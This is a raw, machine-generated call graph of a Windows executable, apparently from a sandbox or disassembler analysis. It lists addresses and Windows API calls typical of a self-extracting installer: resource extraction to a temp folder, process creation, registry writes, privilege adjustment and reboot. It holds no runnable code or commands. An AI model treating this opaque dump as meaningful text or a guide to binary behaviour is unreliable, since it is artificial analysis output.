a3307a 2304->2309 2657 a3256d 2304->2657 2724 a36285 GetLastError 2306->2724 2307->2296 2311 a33098 2309->2311 2668 a33ba2 2309->2668 2311->2287 2316 a330af 2311->2316 2726 a34169 2316->2726 2320 a352d6 2318->2320 2326 a35316 2318->2326 2319 a3538c 2322 a36ce0 4 API calls 2319->2322 2321 a35300 LocalFree LocalFree 2320->2321 2323 a352eb SetFileAttributesA DeleteFileA 2320->2323 2321->2320 2321->2326 2324 a32c72 2322->2324 2323->2321 2324->2226 2324->2234 2327 a3535e SetCurrentDirectoryA 2326->2327 2328 a365e8 4 API calls 2326->2328 2330 a35374 2326->2330 2329 a32390 13 API calls 2327->2329 2328->2327 2329->2330 2330->2319 3059 a31fe1 2330->3059 2332 a31f9a 2331->2332 2336 a31f9f 2331->2336 2333 a31ea7 15 API calls 2332->2333 2333->2336 2334 a31ee2 GetCurrentProcess OpenProcessToken 2341 a31f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2334->2341 2342 a31f0e 2334->2342 2335 a31fcf ExitWindowsEx 2339 a31fd9 2335->2339 2337 a344b9 20 API calls 2336->2337 2338 a31fc0 2336->2338 2336->2339 2337->2338 2338->2334 2338->2335 2338->2339 2339->2226 2341->2342 2343 a31f6b ExitWindowsEx 2341->2343 2345 a344b9 20 API calls 2342->2345 2343->2342 2344 a31f1f 2343->2344 2346 a36ce0 4 API calls 2344->2346 2345->2344 2347 a31f8c 2346->2347 2347->2226 2349 a346b6 2348->2349 2350 a32d1a 2348->2350 2349->2350 2351 a346be FindResourceA LoadResource LockResource 2349->2351 2350->2238 2350->2240 2351->2350 2352 a346df memcpy_s FreeResource 2351->2352 2352->2350 2354 a36ceb 2353->2354 2355 a36ce8 2353->2355 2470 a36cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2470 2355->2253 2357 a36e26 2357->2253 2359 a3455a 2358->2359 2360 a344fe LoadStringA 2358->2360 2364 a36ce0 4 API calls 2359->2364 2361 a34562 2360->2361 2362 a34527 2360->2362 2367 a345c9 2361->2367 2373 a3457e 2361->2373 2471 a3681f 2362->2471 2366 a34689 2364->2366 2366->2250 2370 a34607 LocalAlloc 2367->2370 2371 a345cd LocalAlloc 2367->2371 2368 a34536 MessageBoxA 2368->2359 2370->2359 2383 a345c4 2370->2383 2371->2359 2377 a345f3 2371->2377 2373->2373 2376 a34596 LocalAlloc 2373->2376 2375 a3462d MessageBeep 2378 a3681f 10 API calls 2375->2378 2376->2359 2379 a345af 2376->2379 2380 a3171e _vsnprintf 2377->2380 2381 a3463b 2378->2381 2488 a3171e 2379->2488 2380->2383 2384 a34645 MessageBoxA LocalFree 2381->2384 2385 a367c9 EnumResourceLanguagesA 2381->2385 2383->2375 2384->2359 2385->2384 2394 a35e17 2387->2394 2397 a35cc3 2387->2397 2388 a35dd0 2392 a35dec GetModuleFileNameA 2388->2392 2388->2394 2389 a36ce0 4 API calls 2391 a32e2c 2389->2391 2390 a35ced CharNextA 2390->2397 2391->2238 2391->2256 2393 a35e0a 2392->2393 2392->2394 2498 a366c8 2393->2498 2394->2389 2396 a36218 2507 a36e2a 2396->2507 2397->2388 2397->2390 2397->2394 2397->2396 2400 a35e36 CharUpperA 2397->2400 2406 a35f9f CharUpperA 2397->2406 2407 a35f59 CompareStringA 2397->2407 2408 a36003 CharUpperA 2397->2408 2409 a35edc CharUpperA 2397->2409 2410 a360a2 CharUpperA 2397->2410 2411 a3667f IsDBCSLeadByte CharNextA 2397->2411 2503 a3658a 2397->2503 2400->2397 2401 a361d0 2400->2401 2402 a344b9 20 API calls 2401->2402 2403 a361e7 2402->2403 2404 a361f0 CloseHandle 2403->2404 2405 a361f7 ExitProcess 2403->2405 2404->2405 2406->2397 2407->2397 2408->2397 2409->2397 2410->2397 2411->2397 2414 a324cb 2413->2414 2417 a323b9 2413->2417 2415 a36ce0 4 API calls 2414->2415 2416 a324dc 2415->2416 2416->2250 2417->2414 2418 a323e9 FindFirstFileA 2417->2418 2418->2414 2426 a32407 2418->2426 2419 a32421 lstrcmpA 2421 a32431 lstrcmpA 2419->2421 2422 a324a9 FindNextFileA 2419->2422 2420 a32479 2423 a32488 SetFileAttributesA DeleteFileA 2420->2423 2421->2422 2421->2426 2424 a324bd FindClose RemoveDirectoryA 2422->2424 2422->2426 2423->2422 2424->2414 2425 a3658a CharPrevA 2425->2426 2426->2419 2426->2420 2426->2422 2426->2425 2427 a32390 5 API calls 2426->2427 2427->2426 2432 a33737 2428->2432 2434 a3372d 2428->2434 2429 a344b9 20 API calls 2442 a339fc 2429->2442 2430 a36ce0 4 API calls 2431 a32e92 2430->2431 2431->2244 2431->2250 2443 a318a3 2431->2443 2432->2434 2435 a338a4 2432->2435 2432->2442 2514 a328e8 2432->2514 2434->2429 2434->2442 2435->2434 2436 a339c1 MessageBeep 2435->2436 2435->2442 2437 a3681f 10 API calls 2436->2437 2438 a339ce 2437->2438 2439 a339d8 MessageBoxA 2438->2439 2441 a367c9 EnumResourceLanguagesA 2438->2441 2439->2442 2441->2439 2442->2430 2444 a318d5 2443->2444 2445 a319b8 2443->2445 2543 a317ee LoadLibraryA 2444->2543 2447 a36ce0 4 API calls 2445->2447 2449 a319d5 2447->2449 2449->2250 2463 a36517 FindResourceA 2449->2463 2450 a318e5 GetCurrentProcess OpenProcessToken 2450->2445 2451 a31900 GetTokenInformation 2450->2451 2452 a319aa CloseHandle 2451->2452 2453 a31918 GetLastError 2451->2453 2452->2445 2453->2452 2454 a31927 LocalAlloc 2453->2454 2455 a319a9 2454->2455 2456 a31938 GetTokenInformation 2454->2456 2455->2452 2457 a319a2 LocalFree 2456->2457 2458 a3194e AllocateAndInitializeSid 2456->2458 2457->2455 2458->2457 2461 a3196e 2458->2461 2459 a31999 FreeSid 2459->2457 2460 a31975 EqualSid 2460->2461 2462 a3198c 2460->2462 2461->2459 2461->2460 2461->2462 2462->2459 2464 a36536 LoadResource 2463->2464 2465 a3656b 2463->2465 2464->2465 2466 a36544 DialogBoxIndirectParamA FreeResource 2464->2466 2467 a344b9 20 API calls 2465->2467 2466->2465 2469 a3657c 2466->2469 2467->2469 2469->2250 2470->2357 2472 a36857 GetVersionExA 2471->2472 2474 a3691a 2471->2474 2472->2474 2475 a3687c 2472->2475 2473 a36ce0 4 API calls 2476 a3452c 2473->2476 2474->2473 2475->2474 2477 a368a5 GetSystemMetrics 2475->2477 2476->2368 2482 a367c9 2476->2482 2477->2474 2478 a368b5 RegOpenKeyExA 2477->2478 2478->2474 2479 a368d6 RegQueryValueExA RegCloseKey 2478->2479 2479->2474 2480 a3690c 2479->2480 2492 a366f9 2480->2492 2483 a367e2 2482->2483 2484 a36803 2482->2484 2496 a36793 EnumResourceLanguagesA 2483->2496 2484->2368 2486 a367f5 2486->2484 2497 a36793 EnumResourceLanguagesA 2486->2497 2489 a3172d 2488->2489 2490 a3173d _vsnprintf 2489->2490 2491 a3175d 2489->2491 2490->2491 2491->2383 2493 a3670f 2492->2493 2494 a36740 CharNextA 2493->2494 2495 a3674b 2493->2495 2494->2493 2495->2474 2496->2486 2497->2484 2501 a366d5 2498->2501 2499 a366f3 2499->2394 2501->2499 2502 a366e5 CharNextA 2501->2502 2510 a36648 2501->2510 2502->2501 2504 a3659b 2503->2504 2504->2504 2505 a365b8 CharPrevA 2504->2505 2506 a365ab 2504->2506 2505->2506 2506->2397 2513 a36cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a3621d 2511 a3665d IsDBCSLeadByte 2510->2511 2512 a36668 2510->2512 2511->2512 2512->2501 2513->2509 2515 a32a62 2514->2515 2522 a3290d 2514->2522 2516 a32a75 2515->2516 2517 a32a6e GlobalFree 2515->2517 2516->2435 2517->2516 2519 a32955 GlobalAlloc 2519->2515 2520 a32968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 a32a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 a32a80 GlobalUnlock 2522->2523 2524 a32773 2522->2524 2523->2515 2525 a327a3 CharUpperA CharNextA CharNextA 2524->2525 2526 a328b2 2524->2526 2527 a328b7 GetSystemDirectoryA 2525->2527 2528 a327db 2525->2528 2526->2527 2531 a328bf 2527->2531 2529 a327e3 2528->2529 2530 a328a8 GetWindowsDirectoryA 2528->2530 2536 a3658a CharPrevA 2529->2536 2530->2531 2532 a328d2 2531->2532 2533 a3658a CharPrevA 2531->2533 2534 a36ce0 4 API calls 2532->2534 2533->2532 2535 a328e2 2534->2535 2535->2522 2537 a32810 RegOpenKeyExA 2536->2537 2537->2531 2538 a32837 RegQueryValueExA 2537->2538 2539 a3289a RegCloseKey 2538->2539 2540 a3285c 2538->2540 2539->2531 2541 a32867 ExpandEnvironmentStringsA 2540->2541 2542 a3287a 2540->2542 2541->2542 2542->2539 2544 a31890 2543->2544 2545 a31826 GetProcAddress 2543->2545 2546 a36ce0 4 API calls 2544->2546 2547 a31889 FreeLibrary 2545->2547 2548 a31839 AllocateAndInitializeSid 2545->2548 2549 a3189f 2546->2549 2547->2544 2548->2547 2551 a3185f FreeSid 2548->2551 2549->2445 2549->2450 2551->2547 2553 a3468f 7 API calls 2552->2553 2554 a351f9 LocalAlloc 2553->2554 2555 a3522d 2554->2555 2556 a3520d 2554->2556 2558 a3468f 7 API calls 2555->2558 2557 a344b9 20 API calls 2556->2557 2559 a3521e 2557->2559 2560 a3523a 2558->2560 2561 a36285 GetLastError 2559->2561 2562 a35262 lstrcmpA 2560->2562 2563 a3523e 2560->2563 2571 a35223 2561->2571 2564 a35272 LocalFree 2562->2564 2565 a3527e 2562->2565 2566 a344b9 20 API calls 2563->2566 2567 a32f4d 2564->2567 2568 a344b9 20 API calls 2565->2568 2569 a3524f LocalFree 2566->2569 2567->2279 2567->2280 2567->2287 2570 a35290 LocalFree 2568->2570 2569->2567 2570->2571 2571->2567 2573 a3468f 7 API calls 2572->2573 2574 a35175 2573->2574 2575 a3517a 2574->2575 2576 a351af 2574->2576 2578 a344b9 20 API calls 2575->2578 2577 a3468f 7 API calls 2576->2577 2579 a351c0 2577->2579 2586 a3518d 2578->2586 2739 a36298 2579->2739 2583 a351e1 2583->2284 2584 a351ce 2585 a344b9 20 API calls 2584->2585 2585->2586 2586->2284 2588 a3468f 7 API calls 2587->2588 2589 a355c7 LocalAlloc 2588->2589 2590 a355db 2589->2590 2591 a355fd 2589->2591 2592 a344b9 20 API calls 2590->2592 2593 a3468f 7 API calls 2591->2593 2595 a355ec 2592->2595 2594 a3560a 2593->2594 2596 a35632 lstrcmpA 2594->2596 2597 a3560e 2594->2597 2598 a36285 GetLastError 2595->2598 2600 a35645 2596->2600 2601 a3564b LocalFree 2596->2601 2599 a344b9 20 API calls 2597->2599 2602 a355f1 2598->2602 2603 a3561f LocalFree 2599->2603 2600->2601 2604 a35696 2601->2604 2605 a3565b 2601->2605 2625 a355f6 2602->2625 2603->2625 2606 a3589f 2604->2606 2608 a356ae GetTempPathA 2604->2608 2613 a35467 49 API calls 2605->2613 2609 a36517 24 API calls 2606->2609 2607 a36ce0 4 API calls 2610 a32f7e 2607->2610 2611 a356eb 2608->2611 2612 a356c3 2608->2612 2609->2625 2610->2287 2610->2291 2619 a35717 GetDriveTypeA 2611->2619 2620 a3586c GetWindowsDirectoryA 2611->2620 2611->2625 2751 a35467 2612->2751 2615 a35678 2613->2615 2617 a35680 2615->2617 2615->2625 2618 a344b9 20 API calls 2617->2618 2618->2602 2621 a35730 GetFileAttributesA 2619->2621 2635 a3572b 2619->2635 2785 a3597d GetCurrentDirectoryA SetCurrentDirectoryA 2620->2785 2621->2635 2625->2607 2626 a35467 49 API calls 2626->2611 2627 a32630 21 API calls 2627->2635 2629 a357c1 GetWindowsDirectoryA 2629->2635 2630 a3597d 34 API calls 2630->2635 2631 a3658a CharPrevA 2632 a357e8 GetFileAttributesA 2631->2632 2633 a357fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 a35827 SetFileAttributesA 2634->2635 2635->2619 2635->2620 2635->2621 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 a35467 49 API calls 2635->2636 2781 a36952 2635->2781 2636->2635 2638 a36249 2637->2638 2639 a36268 2637->2639 2641 a344b9 20 API calls 2638->2641 2640 a3597d 34 API calls 2639->2640 2642 a36277 2640->2642 2643 a3625a 2641->2643 2644 a36ce0 4 API calls 2642->2644 2645 a36285 GetLastError 2643->2645 2646 a33013 2644->2646 2647 a3625f 2645->2647 2646->2287 2646->2298 2647->2642 2650 a33b2d 2648->2650 2649 a33b72 2852 a34fe0 2649->2852 2650->2649 2651 a33b53 2650->2651 2653 a36517 24 API calls 2651->2653 2654 a33b70 2653->2654 2655 a36298 10 API calls 2654->2655 2656 a33b7b 2654->2656 2655->2656 2656->2304 2658 a32583 2657->2658 2659 a32622 2657->2659 2661 a3258b 2658->2661 2662 a325e8 RegOpenKeyExA 2658->2662 2906 a324e0 GetWindowsDirectoryA 2659->2906 2663 a325e3 2661->2663 2665 a3259b RegOpenKeyExA 2661->2665 2662->2663 2664 a32609 RegQueryInfoKeyA 2662->2664 2663->2309 2666 a325d1 RegCloseKey 2664->2666 2665->2663 2667 a325bc RegQueryValueExA 2665->2667 2666->2663 2667->2666 2669 a33bdb 2668->2669 2685 a33bec 2668->2685 2670 a3468f 7 API calls 2669->2670 2670->2685 2671 a33c03 memset 2671->2685 2672 a3468f 7 API calls 2672->2685 2673 a33d13 2674 a344b9 20 API calls 2673->2674 2675 a33d26 2674->2675 2677 a33f4d 2675->2677 2678 a36ce0 4 API calls 2677->2678 2679 a33f60 2678->2679 2679->2311 2680 a33d7b CompareStringA 2681 a33fd7 2680->2681 2680->2685 2681->2677 3004 a32267 2681->3004 2684 a33fab 2686 a344b9 20 API calls 2684->2686 2685->2671 2685->2672 2685->2673 2685->2677 2685->2680 2685->2681 2685->2684 2687 a33f46 LocalFree 2685->2687 2688 a33f1e LocalFree 2685->2688 2692 a33cc7 CompareStringA 2685->2692 2702 a33e10 2685->2702 2914 a31ae8 2685->2914 2954 a3202a memset memset RegCreateKeyExA 2685->2954 2980 a33fef 2685->2980 2690 a33fbe LocalFree 2686->2690 2687->2677 2688->2681 2688->2685 2690->2677 2692->2685 2693 a33f92 2696 a344b9 20 API calls 2693->2696 2694 a33e1f GetProcAddress 2695 a33f64 2694->2695 2694->2702 2697 a344b9 20 API calls 2695->2697 2698 a33fa9 2696->2698 2699 a33f75 FreeLibrary 2697->2699 2700 a33f7c LocalFree 2698->2700 2699->2700 2701 a36285 GetLastError 2700->2701 2701->2675 2702->2693 2702->2694 2703 a33f40 FreeLibrary 2702->2703 2704 a33eff FreeLibrary 2702->2704 2994 a36495 2702->2994 2703->2687 2704->2688 2706 a3468f 7 API calls 2705->2706 2707 a33a55 LocalAlloc 2706->2707 2708 a33a8e 2707->2708 2709 a33a6c 2707->2709 2710 a3468f 7 API calls 2708->2710 2711 a344b9 20 API calls 2709->2711 2712 a33a98 2710->2712 2713 a33a7d 2711->2713 2714 a33ac5 lstrcmpA 2712->2714 2715 a33a9c 2712->2715 2716 a36285 GetLastError 2713->2716 2718 a33ada 2714->2718 2719 a33b0d LocalFree 2714->2719 2717 a344b9 20 API calls 2715->2717 2720 a32f64 2716->2720 2721 a33aad LocalFree 2717->2721 2722 a36517 24 API calls 2718->2722 2719->2720 2720->2279 2720->2287 2721->2720 2723 a33aec LocalFree 2722->2723 2723->2720 2725 a3303c 2724->2725 2725->2287 2727 a3468f 7 API calls 2726->2727 2728 a3417d LocalAlloc 2727->2728 2729 a34195 2728->2729 2730 a341a8 2728->2730 2731 a344b9 20 API calls 2729->2731 2732 a3468f 7 API calls 2730->2732 2733 a341a6 2731->2733 2734 a341b5 2732->2734 2733->2287 2735 a341c5 lstrcmpA 2734->2735 2736 a341b9 2734->2736 2735->2736 2737 a341e6 LocalFree 2735->2737 2738 a344b9 20 API calls 2736->2738 2737->2733 2738->2737 2740 a3171e _vsnprintf 2739->2740 2741 a362c9 FindResourceA 2740->2741 2743 a36353 2741->2743 2744 a362cb LoadResource LockResource 2741->2744 2745 a36ce0 4 API calls 2743->2745 2744->2743 2747 a362e0 2744->2747 2746 a351ca 2745->2746 2746->2583 2746->2584 2748 a36355 FreeResource 2747->2748 2749 a3631b FreeResource 2747->2749 2748->2743 2750 a3171e _vsnprintf 2749->2750 2750->2741 2752 a3548a 2751->2752 2753 a3551a 2751->2753 2812 a353a1 2752->2812 2823 a358c8 2753->2823 2755 a35495 2757 a35581 2755->2757 2762 a354c2 GetSystemInfo 2755->2762 2763 a3550c 2755->2763 2759 a36ce0 4 API calls 2757->2759 2764 a3559a 2759->2764 2760 a3553b CreateDirectoryA 2765 a35577 2760->2765 2766 a35547 2760->2766 2761 a3554d 2761->2757 2769 a3597d 34 API calls 2761->2769 2774 a354da 2762->2774 2767 a3658a CharPrevA 2763->2767 2764->2625 2775 a32630 GetWindowsDirectoryA 2764->2775 2768 a36285 GetLastError 2765->2768 2766->2761 2767->2753 2770 a3557c 2768->2770 2771 a3555c 2769->2771 2770->2757 2771->2757 2773 a35568 RemoveDirectoryA 2771->2773 2772 a3658a CharPrevA 2772->2763 2773->2757 2774->2763 2774->2772 2776 a3266f 2775->2776 2777 a3265e 2775->2777 2778 a36ce0 4 API calls 2776->2778 2779 a344b9 20 API calls 2777->2779 2780 a32687 2778->2780 2779->2776 2780->2611 2780->2626 2782 a369a1 2781->2782 2783 a3696e GetDiskFreeSpaceA 2781->2783 2782->2635 2783->2782 2784 a36989 MulDiv 2783->2784 2784->2782 2786 a359bb 2785->2786 2787 a359dd GetDiskFreeSpaceA 2785->2787 2788 a344b9 20 API calls 2786->2788 2789 a35ba1 memset 2787->2789 2790 a35a21 MulDiv 2787->2790 2791 a359cc 2788->2791 2792 a36285 GetLastError 2789->2792 2790->2789 2793 a35a50 GetVolumeInformationA 2790->2793 2794 a36285 GetLastError 2791->2794 2795 a35bbc GetLastError FormatMessageA 2792->2795 2796 a35ab5 SetCurrentDirectoryA 2793->2796 2797 a35a6e memset 2793->2797 2809 a359d1 2794->2809 2798 a35be3 2795->2798 2806 a35acc 2796->2806 2799 a36285 GetLastError 2797->2799 2800 a344b9 20 API calls 2798->2800 2801 a35a89 GetLastError FormatMessageA 2799->2801 2803 a35bf5 SetCurrentDirectoryA 2800->2803 2801->2798 2802 a36ce0 4 API calls 2805 a35c11 2802->2805 2804 a35b94 2803->2804 2804->2802 2805->2611 2807 a35b0a 2806->2807 2810 a35b20 2806->2810 2808 a344b9 20 API calls 2807->2808 2808->2809 2809->2804 2810->2804 2835 a3268b 2810->2835 2814 a353bf 2812->2814 2813 a3171e _vsnprintf 2813->2814 2814->2813 2815 a3658a CharPrevA 2814->2815 2818 a35415 GetTempFileNameA 2814->2818 2816 a353fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a3544f CreateDirectoryA 2816->2817 2817->2818 2819 a3543a 2817->2819 2818->2819 2820 a35429 DeleteFileA CreateDirectoryA 2818->2820 2821 a36ce0 4 API calls 2819->2821 2820->2819 2822 a35449 2821->2822 2822->2755 2824 a358d8 2823->2824 2824->2824 2825 a358df LocalAlloc 2824->2825 2826 a358f3 2825->2826 2828 a35919 2825->2828 2827 a344b9 20 API calls 2826->2827 2829 a35906 2827->2829 2831 a3658a CharPrevA 2828->2831 2830 a36285 GetLastError 2829->2830 2832 a35534 2829->2832 2830->2832 2833 a35931 CreateFileA LocalFree 2831->2833 2832->2760 2832->2761 2833->2829 2834 a3595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 a326e5 2835->2836 2837 a326b9 2835->2837 2838 a326ea 2836->2838 2839 a3271f 2836->2839 2840 a3171e _vsnprintf 2837->2840 2842 a3171e _vsnprintf 2838->2842 2843 a326e3 2839->2843 2847 a3171e _vsnprintf 2839->2847 2841 a326cc 2840->2841 2844 a344b9 20 API calls 2841->2844 2846 a326fd 2842->2846 2845 a36ce0 4 API calls 2843->2845 2844->2843 2848 a3276d 2845->2848 2849 a344b9 20 API calls 2846->2849 2850 a32735 2847->2850 2848->2804 2849->2843 2851 a344b9 20 API calls 2850->2851 2851->2843 2853 a3468f 7 API calls 2852->2853 2854 a34ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a35020 2854->2855 2871 a3515f 2854->2871 2856 a35057 2855->2856 2857 a35029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2857 2874 a34efd 2856->2874 2857->2856 2860 a35060 2862 a344b9 20 API calls 2860->2862 2861 a3507c 2864 a350e8 2861->2864 2868 a35106 2861->2868 2863 a35075 2862->2863 2863->2868 2865 a344b9 20 API calls 2864->2865 2865->2863 2866 a35110 FreeResource 2867 a3511d 2866->2867 2869 a35129 2867->2869 2870 a3513a 2867->2870 2868->2866 2868->2867 2872 a344b9 20 API calls 2869->2872 2870->2871 2873 a3514c SendMessageA 2870->2873 2871->2654 2872->2870 2873->2871 2875 a34f4a 2874->2875 2876 a34fa1 2875->2876 2882 a34980 2875->2882 2878 a36ce0 4 API calls 2876->2878 2879 a34fc6 2878->2879 2879->2860 2879->2861 2883 a34990 2882->2883 2884 a349c2 lstrcmpA 2883->2884 2885 a349a5 2883->2885 2887 a349ba 2884->2887 2888 a34a0e 2884->2888 2886 a344b9 20 API calls 2885->2886 2886->2887 2887->2876 2890 a34b60 2887->2890 2888->2887 2893 a3487a 2888->2893 2891 a34b92 FindCloseChangeNotification 2890->2891 2892 a34b76 2890->2892 2891->2892 2892->2876 2894 a348a2 CreateFileA 2893->2894 2896 a348e9 2894->2896 2897 a34908 2894->2897 2896->2897 2898 a348ee 2896->2898 2897->2887 2901 a3490c 2898->2901 2902 a348f5 CreateFileA 2901->2902 2903 a34917 2901->2903 2902->2897 2903->2902 2904 a34962 CharNextA 2903->2904 2905 a34953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 a32510 2906->2907 2908 a3255b 2906->2908 2909 a3658a CharPrevA 2907->2909 2910 a36ce0 4 API calls 2908->2910 2911 a32522 WritePrivateProfileStringA _lopen 2909->2911 2912 a32569 2910->2912 2911->2908 2913 a32548 _llseek _lclose 2911->2913 2912->2663 2913->2908 2915 a31b25 2914->2915 3018 a31a84 2915->3018 2917 a31b57 2918 a3658a CharPrevA 2917->2918 2920 a31b8c 2917->2920 2918->2920 2919 a366c8 2 API calls 2921 a31bd1 2919->2921 2920->2919 2922 a31d73 2921->2922 2923 a31bd9 CompareStringA 2921->2923 2925 a366c8 2 API calls 2922->2925 2923->2922 2924 a31bf7 GetFileAttributesA 2923->2924 2926 a31d53 2924->2926 2927 a31c0d 2924->2927 2928 a31d7d 2925->2928 2931 a344b9 20 API calls 2926->2931 2927->2926 2933 a31a84 2 API calls 2927->2933 2929 a31d81 CompareStringA 2928->2929 2930 a31df8 LocalAlloc 2928->2930 2929->2930 2939 a31d9b 2929->2939 2930->2926 2932 a31e0b GetFileAttributesA 2930->2932 2951 a31cc2 2931->2951 2934 a31e1d 2932->2934 2952 a31e45 2932->2952 2935 a31c31 2933->2935 2934->2952 2937 a31c50 LocalAlloc 2935->2937 2944 a31a84 2 API calls 2935->2944 2936 a31e89 2938 a36ce0 4 API calls 2936->2938 2937->2926 2940 a31c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2940 2943 a31ea1 2938->2943 2939->2939 2945 a31dbe LocalAlloc 2939->2945 2946 a31cf8 2940->2946 2940->2951 2943->2685 2944->2937 2945->2926 2947 a31de1 2945->2947 2949 a31d23 2946->2949 2950 a31d09 GetShortPathNameA 2946->2950 2948 a3171e _vsnprintf 2947->2948 2948->2951 2953 a3171e _vsnprintf 2949->2953 2950->2949 2951->2936 3024 a32aac 2952->3024 2953->2951 2955 a32256 2954->2955 2956 a3209a 2954->2956 2957 a36ce0 4 API calls 2955->2957 2959 a3171e _vsnprintf 2956->2959 2961 a320dc 2956->2961 2958 a32263 2957->2958 2958->2685 2960 a320af RegQueryValueExA 2959->2960 2960->2956 2960->2961 2962 a320e4 RegCloseKey 2961->2962 2963 a320fb GetSystemDirectoryA 2961->2963 2962->2955 2964 a3658a CharPrevA 2963->2964 2965 a3211b LoadLibraryA 2964->2965 2966 a32179 GetModuleFileNameA 2965->2966 2967 a3212e GetProcAddress FreeLibrary 2965->2967 2969 a321de RegCloseKey 2966->2969 2971 a32177 2966->2971 2967->2966 2968 a3214e GetSystemDirectoryA 2967->2968 2970 a32165 2968->2970 2968->2971 2969->2955 2972 a3658a CharPrevA 2970->2972 2971->2971 2973 a321b7 LocalAlloc 2971->2973 2972->2971 2974 a321cd 2973->2974 2975 a321ec 2973->2975 2976 a344b9 20 API calls 2974->2976 2977 a3171e _vsnprintf 2975->2977 2976->2969 2978 a32218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2955 2981 a34016 CreateProcessA 2980->2981 2993 a34106 2980->2993 2982 a34041 WaitForSingleObject GetExitCodeProcess 2981->2982 2983 a340c4 2981->2983 2986 a34070 2982->2986 2985 a36285 GetLastError 2983->2985 2984 a36ce0 4 API calls 2987 a34117 2984->2987 2988 a340c9 GetLastError FormatMessageA 2985->2988 3051 a3411b 2986->3051 2987->2685 2990 a344b9 20 API calls 2988->2990 2990->2993 2991 a34096 CloseHandle CloseHandle 2992 a340ba 2991->2992 2991->2993 2992->2993 2993->2984 2995 a364c2 2994->2995 2996 a3658a CharPrevA 2995->2996 2997 a364d8 GetFileAttributesA 2996->2997 2998 a36501 LoadLibraryA 2997->2998 2999 a364ea 2997->2999 3001 a36508 2998->3001 2999->2998 3000 a364ee LoadLibraryExA 2999->3000 3000->3001 3002 a36ce0 4 API calls 3001->3002 3003 a36513 3002->3003 3003->2702 3005 a32381 3004->3005 3006 a32289 RegOpenKeyExA 3004->3006 3007 a36ce0 4 API calls 3005->3007 3006->3005 3008 a322b1 RegQueryValueExA 3006->3008 3009 a3238c 3007->3009 3010 a322e6 memset GetSystemDirectoryA 3008->3010 3011 a32374 RegCloseKey 3008->3011 3009->2677 3012 a32321 3010->3012 3013 a3230f 3010->3013 3011->3005 3014 a3171e _vsnprintf 3012->3014 3015 a3658a CharPrevA 3013->3015 3016 a3233f RegSetValueExA 3014->3016 3015->3012 3016->3011 3022 a31a9a 3018->3022 3020 a31aaf 3021 a31aba 3020->3021 3023 a3667f 2 API calls 3020->3023 3021->2917 3022->3020 3022->3021 3037 a3667f 3022->3037 3023->3020 3025 a32ad4 GetModuleFileNameA 3024->3025 3029 a32be6 3024->3029 3036 a32b02 3025->3036 3026 a36ce0 4 API calls 3027 a32bf5 3026->3027 3027->2936 3028 a32af1 IsDBCSLeadByte 3028->3036 3029->3026 3030 a32b11 CharNextA CharUpperA 3032 a32b8d CharUpperA 3030->3032 3030->3036 3031 a32bca CharNextA 3033 a32bd3 CharNextA 3031->3033 3032->3036 3033->3036 3035 a32b43 CharPrevA 3035->3036 3036->3028 3036->3029 3036->3030 3036->3031 3036->3033 3036->3035 3042 a365e8 3036->3042 3038 a36689 3037->3038 3039 a366a5 3038->3039 3040 a36648 IsDBCSLeadByte 3038->3040 3041 a36697 CharNextA 3038->3041 3039->3022 3040->3038 3041->3038 3043 a365f4 3042->3043 3043->3043 3044 a365fb CharPrevA 3043->3044 3045 a36611 CharPrevA 3044->3045 3046 a3660b 3045->3046 3047 a3661e 3045->3047 3046->3045 3046->3047 3048 a3663d 3047->3048 3049 a36627 CharPrevA 3047->3049 3050 a36634 CharNextA 3047->3050 3048->3036 3049->3048 3049->3050 3050->3048 3052 a34132 3051->3052 3054 a3412a 3051->3054 3055 a31ea7 3052->3055 3054->2991 3056 a31eba 3055->3056 3057 a31ed3 3055->3057 3058 a3256d 15 API calls 3056->3058 3057->3054 3058->3057 3060 a31ff0 RegOpenKeyExA 3059->3060 3061 a32026 3059->3061 3060->3061 3062 a3200f RegDeleteValueA RegCloseKey 3060->3062 3061->2319 3062->3061 3127 a319e0 3128 a31a24 GetDesktopWindow 3127->3128 3130 a31a03 3127->3130 3136 a343d0 6 API calls 3128->3136 3129 a31a20 3134 a36ce0 4 API calls 3129->3134 3130->3129 3132 a31a16 EndDialog 3130->3132 3132->3129 3135 a31a7e 3134->3135 3137 a34463 SetWindowPos 3136->3137 3139 a36ce0 4 API calls 3137->3139 3140 a31a33 LoadStringA SetDlgItemTextA MessageBeep 3139->3140 3140->3129 3141 a36a20 __getmainargs 3142 a36bef _XcptFilter 3143 a369b0 3144 a369b5 3143->3144 3152 a36fbe GetModuleHandleW 3144->3152 3146 a369c1 __set_app_type __p__fmode __p__commode 3147 a369f9 3146->3147 3148 a36a02 __setusermatherr 3147->3148 3149 a36a0e 3147->3149 3148->3149 3154 a371ef _controlfp 3149->3154 3151 a36a13 3153 a36fcf 3152->3153 3153->3146 3154->3151 3155 a334f0 3156 a33504 3155->3156 3174 a335b8 3155->3174 3158 a3351b 3156->3158 3159 a335be GetDesktopWindow 3156->3159 3156->3174 3157 a33526 3160 a3354f 3158->3160 3161 a3351f 3158->3161 3163 a343d0 11 API calls 3159->3163 3160->3157 3165 a33559 ResetEvent 3160->3165 3161->3157 3164 a3352d TerminateThread EndDialog 3161->3164 3162 a33671 EndDialog 3162->3157 3166 a335d6 3163->3166 3164->3157 3167 a344b9 20 API calls 3165->3167 3168 a335e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3168 3169 a3361d SetWindowTextA CreateThread 3166->3169 3171 a33581 3167->3171 3168->3169 3169->3157 3170 a33646 3169->3170 3172 a344b9 20 API calls 3170->3172 3173 a3359b SetEvent 3171->3173 3175 a3358a SetEvent 3171->3175 3172->3174 3176 a33680 4 API calls 3173->3176 3174->3157 3174->3162 3175->3157 3176->3174 3177 a36ef0 3178 